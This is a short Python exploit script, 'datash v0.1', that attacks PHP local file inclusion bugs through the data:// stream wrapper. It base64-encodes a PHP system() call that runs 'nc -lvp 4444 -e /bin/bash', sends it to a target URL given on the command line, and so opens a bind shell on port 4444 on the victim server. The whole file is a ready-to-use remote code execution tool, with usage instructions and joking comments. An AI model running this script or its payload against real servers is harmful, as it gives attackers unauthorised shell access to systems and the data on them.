#!/usr/bin/python
# datash v0.1
# Uses PHP's data:// stream for RCE
# For abusing File Inclusion Bugs.
# Author: Darren 'infodox' Martyn
# Site: insecurety.net
# Twatter: @info_dox
import sys
import requests

def banner():
    print """
                    data shell
          datash v0.1 - Insecurety Research
Abuses PHP's data:// stream to execute remote code on servers which are
1. Vulnerable to File Inclusion
2. Allowing data:// to be included
Reliable enough...
 ~ infodox
"""

if len(sys.argv) != 2:
    banner()
    print "Usage: ./datash.py <target url>"
    print "Example: ./datash.py http://localhost/include.php?hax="
    sys.exit(1)
    
targeturl = sys.argv[1]
payload = """nc -lvp 4444 -e /bin/bash &""" # FIXME - Multiple payloads later ;) This is just PoC
phpwrapper = """<?php system('%s'); ?>""" %(payload) # FIXME - Allow multiple PHP wrappers... Later!
encodedphp = phpwrapper.encode('base64') # Base64 encode the php wrapper with the payload in it
inject = """data://text/plain;base64,%s""" %(encodedphp) # This is the data:// injecty thingy :3
print "[+] Target Host: %s" %(targeturl)
print "[*] Popping Shell on 4444... Use netcat to connect..."
hack = targeturl+inject
requests.get(hack) # Like my terrible variable names and use of Requests? You better!
print "[:>] Hope you had fun ;)"